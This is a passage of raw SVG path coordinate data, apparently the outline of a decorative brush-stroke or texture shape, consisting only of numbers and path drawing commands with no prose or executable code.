.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.